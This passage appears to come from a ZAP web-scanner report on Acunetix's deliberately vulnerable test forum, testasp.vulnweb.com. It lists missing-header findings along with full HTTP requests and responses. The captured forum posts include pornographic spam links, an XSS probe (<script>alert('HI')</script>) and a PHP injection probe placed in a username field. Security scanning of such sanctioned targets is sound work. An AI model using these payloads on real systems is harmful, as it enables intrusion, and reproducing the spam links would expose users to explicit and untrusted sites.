class='posttitle'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4533 |
| Response Body - size: 4,533 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4422 |
| Response Body - size: 4,422 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4471 |
| Response Body - size: 4,471 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4174 |
| Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4421 |
| Response Body - size: 4,421 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4138 |
| Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4374 |
| Response Body - size: 4,374 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" 